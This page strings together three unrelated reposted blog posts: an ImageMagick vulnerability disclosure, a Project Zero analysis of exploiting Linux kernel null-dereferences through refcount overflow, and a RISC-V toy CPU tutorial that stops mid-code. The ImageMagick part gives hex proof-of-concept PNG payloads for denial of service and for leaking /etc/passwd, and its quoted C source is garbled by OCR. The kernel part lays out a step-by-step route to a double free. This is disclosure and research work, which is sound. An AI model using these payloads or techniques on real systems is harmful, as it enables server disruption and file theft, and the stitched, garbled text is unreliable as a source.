ImageMagick: The hidden vulnerability behind your online images

ImageMagick: The hidden vulnerability behind your online images

Original text byMetabase Q Team By Bryan Gonzalez from Ocelot Team

Introduction

ImageMagick is a free and open-source software suite for displaying, converting, and editing image files. It can read and write over 200 image file formats and, therefore, is very common to find it in websites worldwide since there is always a need to process pictures for users’ profiles, catalogs, etc.

In a recent APT Simulation engagement, the Ocelot team identified that ImageMagick was used to process images in a Drupal-based website, and hence, the team decided to try to find new vulnerabilities in this component, proceeding to download the latest version of ImageMagick, 7.1.0-49 at that time. As a result, two zero days were identified:

  • CVE-2022-44267: ImageMagick 7.1.0-49 is vulnerable to Denial of Service. When it parses a PNG image (e.g., for resize), the convert process could be left waiting for stdin input.
  • CVE-2022-44268: ImageMagick 7.1.0-49 is vulnerable to Information Disclosure. When it parses a PNG image (e.g., for resize), the resulting image could have embedded the content of an arbitrary remote file (if the ImageMagick binary has permissions to read it).

How to trigger the exploitation?

An attacker needs to upload a malicious image to a website using ImageMagick, in order to exploit the above mentioned vulnerabilities remotely.

The Ocelot team is very grateful for the team of volunteers of ImageMagick, who validated and released the patches needed in a timely manner:

https://github.com/ImageMagick/ImageMagick/commit/05673e63c919e61ffa1107804d1138c46547a475

In this blog, the technical details of the vulnerabilities are explained.

CVE-2022-44267: Denial of service

ImageMagick:  7.1.0-49

When ImageMagick parses a PNG file, for example in a resize operation when receiving an image, the convert process could be left waiting for stdin input leading to a Denial of Service since the process won’t be able to process other images.

A malicious actor could craft a PNG or use an existing one and add a textual chunk type (e.g., tEXt). These types have a keyword and a text string. If the keyword is the string “profile” (without quotes) then ImageMagick will interpret the text string as a filename and will load the content as a raw profile. If the specified filename is “-“ (a single dash) ImageMagick will try to read the content from standard input potentially leaving the process waiting forever.

Exploitation Path Execution:

  • Upload image to trigger ImageMagick command, like “convert”
  • ReadOnePNGImage (coders/png.c:2164)
Reading “tEXt” chunk:

SetImageProfile (MagickCore/property.c:4360):
Checking if keyword equals to “profile”:
Copying the text string as filename in line 4720 and saving the content in line 4722:
FileToStringInfo to store the content into string_info->datum, (MagickCore/string.c:1005):
const size_t extent, ExceptionInfo *exception)
{
StringInfo
*string_info;
assert(filename != (const char *) NULL);
assert(exception != (ExceptionInfo *) NULL);
if (IsEventLogging () != MagickFalse)
(void) LogMagickEvent (TraceEvent, GetMagickModule (), "%s", filename);
string_info=AcquireStringInfoContainer();
string_info-›path=ConstantString(filename);
string_info-›datum=(unsigned char *) FileToBlob(filename, extent,
&string_info-›length,exception);
if (string_info-›datum == (unsigned char *) NULL)
{
string_info=DestroyStringInfo(string_info);
return ((StringInfo *) NULL);
return(string_info);
}

FileToBlob (MagickCore/blob.c:1396): Assigning stdin to a filename as “-”, causing the process to wait for input forever:

file=fileno(stdin);
if (LocaleCompare(filename, " -") ! = 0)
{
status=GetPathAttributes (filename, &attributes) ;
if ((status == MagickFalse) || (S_ISDIR(attributes.st_mode) != 0))
{
ThrowFileException(exception, BlobError, "UnableToReadBlob" ,filename);
return (NULL);
?
file=open_utf8 (filename, O_RDONLY | O_BINARY, 0);
}
if (file == -1)
{
ThrovFileException(exception, BlobError, "UnableTo0penFile", filename);
return (NULL);
}
offset=(MagickOffsetType) Iseek(file, O, SEEK_END);
count=0;
if ((file == fileno (stdin)) (offset < 0)
(offset != (MagickOffsetType) ((ssize_t) offset)))
{
size t
quantum;
struct stat
file stats;
/*
Stream is not seekable.
* /
offset= (MagickOffsetType) Iseek(file,O, SEEK_SET);
quantum= (size t) MagickMaxBufferExtent;
if ((fstat (file, &file_stats) == 0) && (file_stats.st_size > 0))
quantum= (size_t) MagickMin(file stats.st_ size,MagickMaxBufferExtent);
blob=(unsigned char *) AcquireQuantumMemory (quantum, sizeof (*blob));
for (i=0; blob != (unsigned char *) NULL; i+=count)
{
count=read(file, blob+i, quantum);

PoC: Malicious PNG File:

89504E470D0A1A0A0000000D49484452000000010000000108000000003A7E9B550000000B49444154789C63F8FF1F00030001FFFC25DC510000000A7445587470726F66696C65002D00600C56A10000000049454E44AE426082

Evidence: Malicious image file: OCELOT_output.png

Stdin input waiting forever:

CVE-2022-44268: Arbitrary Remote Leak

ImageMagick:  7.1.0-49

When ImageMagick parses the PNG file, for example in a resize operation, the resulting image could have embedded the content of an arbitrary remote file from the website (if magick binary has permissions to read it).

A malicious actor could craft a PNG or use an existing one and add a textual chunk type (e.g., tEXt). These types have a keyword and a text string. If the keyword is the string “profile” (without quotes) then ImageMagick will interpret the text string as a filename and will load the content as a raw profile, then the attacker can download the resized image which will come with the content of a remote file.

Exploitation Path Execution:

  • Upload image to trigger ImageMagick command, like “convert”
  • ReadOnePNGImage (coders/png.c:2164):

– Reading tEXt chunk:

SetImageProfile (MagickCore/property.c:4360)

Checking if keyword equals to “profile”

Copying the text string as filename in line 4720 and saving the content in line 4722:

FileToStringInfo to store the content into string_info->datum, (MagickCore/string.c:1005):

If a valid (and accessible) filename is provided, the content will be returned to the caller function (FileToStringInfo) and the StringInfo object will return to the SetImageProperty function, saving the blob into the new image generated, thanks to the function SetImageProfile:

This new image will be available to download by the attackers with the arbitrary website file content embedded inside.

PoC: Malicious PNG content to leak “/etc/passwd” file:

89504E470D0A1A0A0000000D4948445200000001000000010100000000376EF9240000000A49444154789C636800000082008177CD72B6000000147445587470726F66696C65002F6574632F70617373776400B7F46D9C0000000049454E44AE426082

Evidence:

Content of the /etc/passwd stored in the image via profile->datum variable:

Hexadecimal representation of the /etc/passwd content, extracted from the image:

Content from /etc/passwd in the website, received in the image generated:

Video showing the exploitation:

Exploiting null-dereferences in the Linux kernel

Exploiting null-dereferences in the Linux kernel

Original text by Seth Jenkins, Project Zero

For a fair amount of time, null-deref bugs were a highly exploitable kernel bug class. Back when the kernel was able to access userland memory without restriction, and userland programs were still able to map the zero page, there were many easy techniques for exploiting null-deref bugs. However with the introduction of modern exploit mitigations such as SMEP and SMAP, as well as mmap_min_addr preventing unprivileged programs from mmap’ing low addresses, null-deref bugs are generally not considered a security issue in modern kernel versions. This blog post provides an exploit technique demonstrating that treating these bugs as universally innocuous often leads to faulty evaluations of their relevance to security.

Kernel oops overview

At present, when the Linux kernel triggers a null-deref from within a process context, it generates an oops, which is distinct from a kernel panic. A panic occurs when the kernel determines that there is no safe way to continue execution, and that therefore all execution must cease. However, the kernel does not stop all execution during an oops — instead the kernel tries to recover as best as it can and continue execution. In the case of a task, that involves throwing out the existing kernel stack and going directly to make_task_dead which calls do_exit. The kernel will also publish in dmesg a “crash” log and kernel backtrace depicting what state the kernel was in when the oops occurred. This may seem like an odd choice to make when memory corruption has clearly occurred — however the intention is to allow kernel bugs to more easily be detectable and loggable under the philosophy that a working system is much easier to debug than a dead one.

The unfortunate side effect of the oops recovery path is that the kernel is not able to perform any associated cleanup that it would normally perform on a typical syscall error recovery path. This means that any locks that were locked at the moment of the oops stay locked, any refcounts remain taken, any memory otherwise temporarily allocated remains allocated, etc. However, the process that generated the oops, its associated kernel stack, task struct and derivative members etc. can and often will be freed, meaning that depending on the precise circumstances of the oops, it’s possible that no memory is actually leaked. This becomes particularly important in regards to exploitation later.

Reference count mismanagement overview

Refcount mismanagement is a fairly well-known and exploitable issue. In the case where software improperly decrements a refcount, this can lead to a classic UAF primitive. The case where software improperly doesn’t decrement a refcount (leaking a reference) is also often exploitable. If the attacker can cause a refcount to be repeatedly improperly incremented, it is possible that given enough effort the refcount may overflow, at which point the software no longer has any remotely sensible idea of how many refcounts are taken on an object. In such a case, it is possible for an attacker to destroy the object by incrementing and decrementing the refcount back to zero after overflowing, while still holding reachable references to the associated memory. 32-bit refcounts are particularly vulnerable to this sort of overflow. It is important however, that each increment of the refcount allocates little or no physical memory. Even a single byte allocation is quite expensive if it must be performed 232 times.

Example null-deref bug

When a kernel oops unceremoniously ends a task, any refcounts that the task was holding remain held, even though all memory associated with the task may be freed when the task exits. Let’s look at an example — an otherwise unrelated bug I coincidentally discovered in the very recent past:

static int show_smaps_rollup(struct seq_file *m, void *v)
{
        struct proc_maps_private *priv = m->private;
        struct mem_size_stats mss;
        struct mm_struct *mm;
        struct vm_area_struct *vma;
        unsigned long last_vma_end = 0;
        int ret = 0;
        priv->task = get_proc_task(priv->inode); //task reference taken
        if (!priv->task)
                return -ESRCH;
        mm = priv->mm; //With no vma's, mm->mmap is NULL
        if (!mm || !mmget_not_zero(mm)) { //mm reference taken
                ret = -ESRCH;
                goto out_put_task;
        }
        memset(&mss, 0, sizeof(mss));
        ret = mmap_read_lock_killable(mm); //mmap read lock taken
        if (ret)
                goto out_put_mm;
        hold_task_mempolicy(priv);
        for (vma = priv->mm->mmap; vma; vma = vma->vm_next) {
                smap_gather_stats(vma, &mss);
                last_vma_end = vma->vm_end;
        }
        show_vma_header_prefix(m, priv->mm->mmap->vm_start,last_vma_end, 0, 0, 0, 0); //the deref of mmap causes a kernel oops here
        seq_pad(m, ' ');
        seq_puts(m, "[rollup]\n");
        __show_smap(m, &mss, true);
        release_task_mempolicy(priv);
        mmap_read_unlock(mm);
out_put_mm:
        mmput(mm);
out_put_task:
        put_task_struct(priv->task);
        priv->task = NULL;
        return ret;
}

This file is intended simply to print a set of memory usage statistics for the respective process. Regardless, this bug report reveals a classic and otherwise innocuous null-deref bug within this function. In the case of a task that has no VMA’s mapped at all, the task’s mm_struct mmap member will be equal to NULL. Thus the priv->mm->mmap->vm_start access causes a null dereference and consequently a kernel oops. This bug can be triggered by simply read’ing /proc/[pid]/smaps_rollup on a task with no VMA’s (which itself can be stably created via ptrace):

This kernel oops will mean that the following events occur:

  1. The associated struct file will have a refcount leaked if fdget took a refcount (we’ll try and make sure this doesn’t happen later)
  2. The associated seq_file within the struct file has a mutex that will forever be locked (any future reads/writes/lseeks etc. will hang forever).
  3. The task struct associated with the smaps_rollup file will have a refcount leaked
  4. The mm_struct’s mm_users refcount associated with the task will be leaked
  5. The mm_struct’s mmap lock will be permanently readlocked (any future write-lock attempts will hang forever)

Each of these conditions is an unintentional side-effect that leads to buggy behaviors, but not all of those behaviors are useful to an attacker. The permanent locking of events 2 and 5 only makes exploitation more difficult. Condition 1 is unexploitable because we cannot leak the struct file refcount again without taking a mutex that will never be unlocked. Condition 3 is unexploitable because a task struct uses a safe saturating kernel refcount_t which prevents the overflow condition. This leaves condition 4. 


The mm_users refcount still uses an overflow-unsafe atomic_t and since we can take a readlock an indefinite number of times, the associated mmap_read_lock does not prevent us from incrementing the refcount again. There are a couple important roadblocks we need to avoid in order to repeatedly leak this refcount:

  1. We cannot call this syscall from the task with the empty vma list itself — in other words, we can’t call read from /proc/self/smaps_rollup. Such a process cannot easily make repeated syscalls since it has no virtual memory mapped. We avoid this by reading smaps_rollup from another process.
  2. We must re-open the smaps_rollup file every time because any future reads we perform on a smaps_rollup instance we already triggered the oops on will deadlock on the local seq_file mutex lock which is locked forever. We also need to destroy the resulting struct file (via close) after we generate the oops in order to prevent untenable memory usage.
  3. If we access the mm through the same pid every time, we will run into the task struct max refcount before we overflow the mm_users refcount. Thus we need to create two separate tasks that share the same mm and balance the oopses we generate across both tasks so the task refcounts grow half as quickly as the mm_users refcount. We do this via the clone flag CLONE_VM
  4. We must avoid opening/reading the smaps_rollup file from a task that has a shared file descriptor table, as otherwise a refcount will be leaked on the struct file itself. This isn’t difficult, just don’t read the file from a multi-threaded process.

Our final refcount leaking overflow strategy is as follows:

  1. Process A forks a process B
  2. Process B issues PTRACE_TRACEME so that when it segfaults upon return from munmap it won’t go away (but rather will enter tracing stop)
  3. Proces B clones with CLONE_VM | CLONE_PTRACE another process C
  4. Process B munmap’s its entire virtual memory address space — this also unmaps process C’s virtual memory address space.
  5. Process A forks new children D and E which will access (B|C)’s smaps_rollup file respectively
  6. (D|E) opens (B|C)’s smaps_rollup file and performs a read which will oops, causing (D|E) to die. mm_users will be refcount leaked/incremented once per oops
  7. Process A goes back to step 5 ~232 times

The above strategy can be rearchitected to run in parallel (across processes not threads, because of roadblock 4) and improve performance. On server setups that print kernel logging to a serial console, generating 232 kernel oopses takes over 2 years. However on a vanilla Kali Linux box using a graphical interface, a demonstrative proof-of-concept takes only about 8 days to complete! At the completion of execution, the mm_users refcount will have overflowed and be set to zero, even though this mm is currently in use by multiple processes and can still be referenced via the proc filesystem.

Exploitation

Once the mm_users refcount has been set to zero, triggering undefined behavior and memory corruption should be fairly easy. By triggering an mmget and an mmput (which we can very easily do by opening the smaps_rollup file once more) we should be able to free the entire mm and cause a UAF condition:

static inline void __mmput(struct mm_struct *mm)
{
        VM_BUG_ON(atomic_read(&mm->mm_users));
        uprobe_clear_state(mm);
        exit_aio(mm);
        ksm_exit(mm);
        khugepaged_exit(mm);
        exit_mmap(mm);
        mm_put_huge_zero_page(mm);
        set_mm_exe_file(mm, NULL);
        if (!list_empty(&mm->mmlist)) {
                spin_lock(&mmlist_lock);
                list_del(&mm->mmlist);
                spin_unlock(&mmlist_lock);
        }
        if (mm->binfmt)
                module_put(mm->binfmt->module);
        lru_gen_del_mm(mm);
        mmdrop(mm);
}

Unfortunately, since 64591e8605 (“mm: protect free_pgtables with mmap_lock write lock in exit_mmap”), exit_mmap unconditionally takes the mmap lock in write mode. Since this mm’s mmap_lock is permanently readlocked many times, any calls to __mmput will manifest as a permanent deadlock inside of exit_mmap.

However, before the call permanently deadlocks, it will call several other functions:

  1. uprobe_clear_state
  2. exit_aio
  3. ksm_exit
  4. khugepaged_exit

Additionally, we can call __mmput on this mm from several tasks simultaneously by having each of them trigger an mmget/mmput on the mm, generating irregular race conditions. Under normal execution, it should not be possible to trigger multiple __mmput’s on the same mm (much less concurrent ones) as __mmput should only be called on the last and only refcount decrement which sets the refcount to zero. However, after the refcount overflow, all mmget/mmput’s on the still-referenced mm will trigger an __mmput. This is because each mmput that decrements the refcount to zero (despite the corresponding mmget being why the refcount was above zero in the first place) believes that it is solely responsible for freeing the associated mm.

This racy __mmput primitive extends to its callees as well. exit_aio is a good candidate for taking advantage of this:

void exit_aio(struct mm_struct *mm)
{
        struct kioctx_table *table = rcu_dereference_raw(mm->ioctx_table);
        struct ctx_rq_wait wait;
        int i, skipped;
        if (!table)
                return;
        atomic_set(&wait.count, table->nr);
        init_completion(&wait.comp);
        skipped = 0;
        for (i = 0; i < table->nr; ++i) {
                struct kioctx *ctx =
                rcu_dereference_protected(table->table[i], true);
                if (!ctx) {
                        skipped++;
                        continue;
                }
                ctx->mmap_size = 0;
                kill_ioctx(mm, ctx, &wait);
        }
        if (!atomic_sub_and_test(skipped, &wait.count)) {
                /* Wait until all IO for the context are done. */
                wait_for_completion(&wait.comp);
        }
        RCU_INIT_POINTER(mm->ioctx_table, NULL);
        kfree(table);
}

While the callee function kill_ioctx is written in such a way to prevent concurrent execution from causing memory corruption (part of the contract of aio allows for kill_ioctx to be called in a concurrent way), exit_aio itself makes no such guarantees. Two concurrent calls of exit_aio on the same mm struct can consequently induce a double free of the mm->ioctx_table object, which is fetched at the beginning of the function, while only being freed at the very end. This race window can be widened substantially by creating many aio contexts in order to slow down exit_aio’s internal context freeing loop. Successful exploitation will trigger the following kernel BUG indicating that a double free has occurred:

Note that as this exit_aio path is hit from __mmput, triggering this race will produce at least two permanently deadlocked processes when those processes later try to take the mmap write lock. However, from an exploitation perspective, this is irrelevant as the memory corruption primitive has already occurred before the deadlock occurs. Exploiting the resultant primitive would probably involve racing a reclaiming allocation in between the two frees of the mm->ioctx_table object, then taking advantage of the resulting UAF condition of the reclaimed allocation. It is undoubtedly possible, although I didn’t take this all the way to a completed PoC.

Conclusion

While the null-dereference bug itself was fixed in October 2022, the more important fix was the introduction of an oops limit which causes the kernel to panic if too many oopses occur. While this patch is already upstream, it is important that distributed kernels also inherit this oops limit and backport it to LTS releases if we want to avoid treating such null-dereference bugs as full-fledged security issues in the future. Even in that best-case scenario, it is nevertheless highly beneficial for security researchers to carefully evaluate the side-effects of bugs discovered in the future that are similarly “harmless” and ensure that the abrupt halt of kernel code execution caused by a kernel oops does not lead to other security-relevant primitives.

How a CPU works: Bare metal C on my RISC-V toy CPU

How a CPU works: Bare metal C on my RISC-V toy CPU

Original text by FLORIAN NOEDING’S BLOG

I always wanted to understand how a CPU works, how it transitions from one instruction to the next and makes a computer work. So after reading Ken Shirrif’s blog about a bug fix in the 8086 processor I thought: Well, let’s try to write one in a hardware description language. This post is a write up of my learning experiment.

I’ll walk through my steps of creating an emulator, compiling and linking C for bare metal, CPU design and finally the implementation of my toy RISC-V CPU.

Goals 

  • implement a CPU in a hardware description language (HDL),
  • code must be synthesizable (except memory),
  • simulate it,
  • and run a bare metal C program on it.

While I had plenty research time, I had only about 30 hours of development time. Without prior hardware design experience the goals had to be simple enough:

  • RISC V Integer instruction set only (minus system and break calls),
  • no interrupt handling or other complexities,
  • no or only minimal optimizations.

My test program written in C is Conway’s game of life, try the interactive web version.

In a future iteration I plan to run my project on a real FPGA and implement a memory controller. Let’s say I made it to about 85% of what I wanted to achieve.

Write an emulator 

Writing an emulator, i.e. a program that can execute the instructions of a CPU, is an excellent stepping stone towards a hardware implementation. For me — without a hardware background — it is much easier to reason about and learn the instruction set.

So my first step was to understand the RISC V instruction set. The RISC V specification is quite long, but I only needed chapters 2 (integer instruction set), 19 (RV32 / 64G instruction set listings) and 20 (assembly programmer’s handbook). These give detailed definitions of how each instruction must be executed, what kind of registers must be implemented, etc.

Let’s look at an example: Arithmetic / logical instructions operating on a register and an immediate value. For 

ADDI
 (add immediate) the following is done: 
rd &lt;- rs1 + imm
: The register identified by rd is set to the sum of the value stored in register rs1 and the value given in the instruction itself.

The emulator is implemented in C++ with a C-style interface in a shared library. This makes it easy to hook it into Python via cffi. This saved me quite a bit of time for file system and user interactions, which were all done in Python.

truct RV32EmuState;

extern "C" RV32EmuState* rv32emu_init();
extern "C" void rv32emu_free(RV32EmuState *state);

extern "C" void rv32emu_set_rom(RV32EmuState *state, void *data, uint32_t size);
extern "C" void rv32emu_read(RV32EmuState *state, uint32_t addr, uint32_t size, void *p);

extern "C" int32_t rv32emu_step(RV32EmuState *state);
extern "C" int32_t rv32emu_run(RV32EmuState *state, uint32_t *breakpoints, uint32_t num_breakpoints);

extern "C" void rv32emu_print(RV32EmuState *state);

The core of the emulator is the 

rv32emu_step
 function, which executes exactly one instruction and then returns. In RISC V each instruction is exactly 32 bits. It first decodes the op code (what kind of operation) and then the specific operation (e.g. ADD immediate). It’s a large, nested switch.

int32_t rv32emu_step(RV32EmuState *state) {
    uint32_t *instr_p = (uint32_t*)(_get_pointer(state, state->pc));
    uint32_t instr = *instr_p;

    // decode
    uint32_t opcode = instr & 0x7F; // instr[6..0]

    switch(opcode) {
        //
        // ... all opcode types ...
        //
        case OPCODE_OP_IMM: {
            uint32_t funct3 = (instr >> 12) & 0x07; // instr[14..12]
            uint32_t rs1 = ((instr >> 15) & 0x1F);

            uint32_t imm = (instr >> 20) & 0x0FFF; // 12 bits
            uint32_t imm_sign = instr & (1ul << 31);
            if(imm_sign) {
                imm |= 0xFFFFF000;
            }

            uint32_t data1 = state->reg[rs1];
            uint32_t data2 = imm;
            uint32_t reg_dest = (instr >> 7) & 0x1F;
            if(reg_dest != 0) { // register 0 is always zero and never written too
                switch(funct3) {
                    //
                    // ... all OP_IMM instructions ...
                    //
                    case FUNCT3_OP_ADD: {
                        state->reg[reg_dest] = data1 + data2;
                        break;
                    }
                }
            }
            break;
        }

    // ...

    state->pc += 4; // go to next instruction for non-jump / non-branch
    return 0;
}

The mathematical and logical operations are simplest to implement, so I started with them. Iteratively I’ve added branches, jumps and the remaining logic until I had covered all instructions other than 

ECALL
 and 
EBREAK
. These two were not necessary for my bare metal experiment.

For testing I relied on simple hand-written assembly code. Of course this did not exercise my emulator thoroughly. So as a next step I wanted to finally run my Conway’s game of life simulation.

Cross compiling, linking and ELF to bin 

Going from C to a bare metal CPU takes a few steps: cross compile, ensure proper memory layout and converting the ELF file to a binary blob. Also instead of having a 

main
 function my code has a 
_start
function defined as follows:

void __attribute__((section (".text.boot"))) _start() {
    run(); // call the actual "entrypoint"
}

I’ll explain the details later.

My CPU only supports the RISC-V 32 bit integer instruction set, but my host system is running on x86-64. So I needed a cross compiler and used the Ubuntu package 

gcc-riscv64-unknown-elf
. Then I could compile my code using the following command:

riscv64-unknown-elf-gcc -march=rv32i -mabi=ilp32 \
    -nostdlib -ffreestanding -Tprograms/memory_map.ld \
    -o life.rv32.elf life.c

Let’s take this apart:

  1. execute the RISC-V cross-compiler
  2. set it’s architecture to rv32i, which is RISC-V 32bit integer instruction set
  3. define the application binary interface, i.e. conventions how to emit assembly. This makes it so that integers, longs and pointers are 32 bit
    • these three are needed to emit code compatible with my emulator and later CPU
  4. compile without a standard library
    • Standard libraries like the system libc assume operating system support, but my toy CPU will be running bare metal. So we have to switch that off. This means we won’t have access to 
      malloc
      printf
      puts
       etc. Instead we’ll need to implement this ourselves, if we want to use it. This means we have no startup code either.
  5. compile freestanding, that is, do not assume presence of a operating system or library and switch of libc specific optimizations and defaults
    • for example we won’t have a main function, which is otherwise required
  6. use a memory map
    • we need to tell the compiler and linker where instructions and global variables will be placed in memory. We do not have a loader to do this at application startup

Even though we do not yet have any hardware, we must make a few decisions for item 6: how should our address space look like?

  • program execution starts at 0x1000, which below I’ll call rom for read-only-memory
  • memory for globals, stack variables and heap will be located at 0x10000000

These values are kind of arbitrary. I wanted to avoid having code at address zero to avoid issues with NULL pointers. This script also ensures that our program entry point, the function 

_start
 is placed at 0x1000, so that the emulator will execute that code first. Here’s my linker script for my address space setup:

ENTRY(_start)

MEMORY
{
    rom (rx ): ORIGIN = 0x00001000, LENGTH = 16M
    ram (rw): ORIGIN = 0x10000000, LENGTH = 32M
}

SECTIONS
{
    .text : {
        /*
            entry point is expected to be the first function here
            --> we are assuming there's only a single function in the .text.boot segment and by convention that is "_start"

            KEEP ensures that "_start" is kept here, even if there are no references to it
        */
        KEEP(*(.text.boot))

        /*
            all other code follows
        */
        *(.text*)
    } > rom

    .rodata : { *(.rodata*) } > rom

    .bss : { *(.bss*) } > ram
}

After compilation we can check that 

_start
 is actually at 0x1000:

riscv64-unknown-elf-readelf -s life.rv32.elf | grep '_start$$'

Now the “problem” is that gcc generates an ELF and not just a stream of instructions. The Executable and Linkable Format is simplified a container to store executable code, data and metadata in a way that makes it easy to later load into memory. As specified by the memory map like the one above. Since my program is fairly it simple does not need memory initialization. So we can simply dump the RISC-V instructions from the .text segment into a binary file.

riscv64-unknown-elf-objdump -O binary life.rv32.elf life.rv32.bin

So now the C snippet from above should make more sense:

void __attribute__((section (".text.boot"))) _start() {
    run();
}

We are defining a function 

_start
 which should go into the segment 
.text.boot
. The linker script instructs the toolchain to make sure this code is placed at 0x1000, even when no other code references it. By having exactly one function in 
.text.boot
 this is guaranteed to happen.

Turns out this is still not enough to make the code work. The startup code above does not initialize the stack pointer, i.e. where local variables live in memory. I decided to simplify things and hard-code the initial stack pointer value in my emulator and CPU. This means simply setting register 

x2
 also known as 
sp
 to the end of the memory, here 0x12000000.

A couple other registers defined in the ABI with special purpose are not used by my program, so I did not implement support: global pointer 

gp
 and thread pointer 
tp
.

No standard library 

When the program is running on my host I rely on the standard library for memory allocation like 

malloc
 or 
putchar
 for output. But when running bare metal these functions are not available.

I’ve replaced dynamic memory allocation with static memory assignments. Since my program is the only one running on CPU, I can use all resources how I see fit. If the flag 

FREESTANDING
 is set, when the program is compiled for my RISC-V emulator / CPU. Without it, the program can run as-is on my host system like any other program.

void run() {
    #ifdef FREESTANDING
        map0 = (unsigned char*)0x10080000;                              // gamestate
        map1 = map0 + 0x80000;                                          // new gamestate
        leds = map1 + 0x80000;                                          // output for emulator
    #else
        map0 = (unsigned char*)malloc((WIDTH + 2) * (HEIGHT + 2));
        map1 = (unsigned char*)malloc((WIDTH + 2) * (HEIGHT + 2));
    #endif

    // ...
}

Instead of relying on 

putchar
 for output to the console, my program assumes that the address of the variable 
leds
 is memory-mapped to an external LED array. In case of the emulator, it will simply read this memory area and display it on console. When running in the simulator (or FPGA in the next iteration), the memory controller will set output pins accordingly.

Emulator in action 

Here’s the result of all of that work: First setting a breakpoint for each game of life cycle, and then manually stepping through the program on the emulated CPU.

Best viewed in full-screen mode due to web-unfriendly layout.

CPU overview 

With the emulator completed I now have a working reference system to debug my CPU. And so I started working implementing it.

A simple CPU consists of the following components:

  • Arithmetic Logic Unit (ALU): the compute part, for operations like “add” or “xor”
  • Register File: provides and stores register values
  • Decoder: transform instruction to a set of control signals, controlling the CPU operation
  • Program Counter: manages the address where the next instruction is found
  • Load Store Unit (LSU): connects the CPU to its memory
  • Control Unit: tieing all the parts together to form a CPU

These are the basic elements of a CPU and sufficient for my toy RISC-V implementation.

Describing hardware in code 

Hardware is designed with special programming languages, called hardware description languages (HDL). The most common ones are Verilog and VHDL. For my project I decided to use Amaranth HDL, because it’s higher level and easier to use — plus it’s written in my favorite language Python. Simplified it enables an engineer to describe a program in Python that generates a hardware description, instead of directly describing it directly in Verilog or VHDL. A nice property of Amaranth HDL is that by design the resulting programs are synthesizable, i.e. they can be “compiled” into a description executable in FPGAs or built as an ASIC.

A key difference between software and hardware is concurrency: In software code is executed line by line, in order and we need special constructs like threads to achieve parallelism. In hardware it’s different: Everything is happening at the same time. We are not describing high-level operations, but rather how logic gates are connected to each other.

Combinational logic 

There are two key concepts in hardware: combinational logic (sometimes also called combinatorial logic) and synchronous logic. Simplified combinational logic executes all the time and all at the same time. In the following example green are input signals, yellow are internal signals (output of logic and input to the next logic), blue is logic and orange is the final output signal:

Combinational logic always updates its output immediately when any input changes. There are a couple physical limitations here, but we’ll simplify this for now. This means changing any signal will immediately change the output signal 

sum
.

In Amaranth we can implement this as

# to run tests: python3 -m pytest add3.py

import pytest

from amaranth import Signal, Module, Elaboratable
from amaranth.build import Platform
from amaranth.sim import Simulator, Settle


class Add3Comb(Elaboratable):
    def __init__(self):
        self.count_1 = Signal(32)
        self.count_2 = Signal(32)
        self.count_3 = Signal(32)
        self.result = Signal(32)

    def elaborate(self, _: Platform) -> Module:
        m = Module()

        # technically this is not needed: a second `+` below would do
        #     but let's build the circuit exactly as shown above
        temp_sum = Signal(32)

        # define how our logic works
        m.d.comb += temp_sum.eq(self.count_1 + self.count_2)
        m.d.comb += self.result.eq(self.count_3 + temp_sum)

        return m


def test_add3comb():
    # set up our device under test
    dut = Add3Comb()

    def bench():
        # set inputs to defined values
        yield dut.count_1.eq(7)
        yield dut.count_2.eq(14)
        yield dut.count_3.eq(21)

        # let the simulation settle down, i.e. arrive at a defined state
        yield Settle()

        # check that the sum is the expected value
        assert (yield dut.result) == 42

    sim = Simulator(dut)
    sim.add_process(bench)
    sim.run()

The key takeaway here is that the lines

 m.d.comb += temp_sum.eq(self.count_1 + self.count_2)
 m.d.comb += self.result.eq(self.count_3 + temp_sum)

are executed at the same time and also whenever the inputs change.

Synchronous Logic 

There’s a second kind of commonly used logic: synchronous logic. The difference to combinational logic is that outputs only change on a clock edge. I.e. when the clock signal goes from low to high (positive edge) or vice versa (negative edge). Let’s use the adder example again. Colors as before, but we’ll use turquoise for synchronous logic.

We use positive edge triggered logic here. So unless the clock goes from low to high, both 

temp sum
 and 
result
 will never change. The following table shows how values change. Let’s furthermore assume the logic was just resetted, so outputs start at 0.

Changes highlighted in bold. This circuit takes on the expected value only after two full clock cycles. Even if the input signals are not defined in the time period after a positive edge and the next positive edge, this will not change the output in any way

Physically things are more complex (“delta time”) and this results in interesting tradeoffs between the length of combinational logic paths (number of gates, circuit length) and the attainable clock speed. Luckily this does not matter for my toy CPU.

In Amaranth we can implement this as

class Add3Sync(Elaboratable):
    def __init__(self):
        self.sync = ClockDomain("sync")
        self.count_1 = Signal(32)
        self.count_2 = Signal(32)
        self.count_3 = Signal(32)
        self.result = Signal(32)

    def elaborate(self, _: Platform) -> Module:
        m = Module()

        temp_sum = Signal(32)

        # define how our logic works
        m.d.sync += temp_sum.eq(self.count_1 + self.count_2)
        m.d.sync += self.result.eq(self.count_3 + temp_sum)

        return m


def test_add3sync():
    # set up our device under test
    dut = Add3Sync()

    def bench():
        # set inputs to defined values
        yield dut.count_1.eq(7)
        yield dut.count_2.eq(14)
        yield dut.count_3.eq(21)

        # let the simulation settle down, i.e. arrive at a defined state
        yield Settle()

        # no positive edge yet, so still at reset value
        assert (yield dut.result) == 0

        # trigger a positive edge on the clock and wait for things to settle down
        yield Tick()
        yield Settle()

        # count3 is reflect in output, since temp sum is still zero
        assert (yield dut.result) == 21

        yield Tick()
        yield Settle()

        # now both count3 and temp sum will be reflected in the output
        assert (yield dut.result) == 42

    sim = Simulator(dut)
    sim.add_process(bench)
    sim.add_clock(1e-6)
    sim.run()

CPU design 

Armed with this knowledge I figured out which things needed to happen in parallel and which things in sequence.

So if we have an ALU related instruction it would work like this:

  1. in parallel
    • read instruction from ROM at the instruction address,
    • decode the instruction,
    • read register values and if present immediate value,
    • compute the result in the ALU,
    • assign ALU result to destination register (not yet visible!)
    • increment instruction address by 4 bytes (not yet visible!)
  2. wait for positive clock edge, giving step 1 time to settle, and in the following instant
    • update instruction address, making the new value visible
    • update destination register value, making the new value visible
  3. repeat, starting at 1.

Iteratively creating a diagrams of how things should work was immensely helpful. Below is a simplified version of my CPU design, though it lacks many of the control signals and special cases for operations related to jumping and branching. Please view in full screen mode, where you can also toggle ALU or LSU layers to make it easier to read. Colors here are just to help with readability of the diagram.

Now let’s talk about the CPU components in detail. Designing them reminded me a lot about functional programming, where the parameters of a function and types naturally guide the implementation. All necessary details about the RISC-V instruction set are specified in detail in the spec.

ALU 

Compute 

data1 $OPERATION data2
. I decided to merge the branch unit into the ALU, so there’s a branch for 
is_branch
.

class ALU(Elaboratable):
    def __init__(self):
        # if set to 0, then normal ALU operation,
        #     otherwise treat funct3 as branch condition operator
        self.i_is_branch = Signal(1)

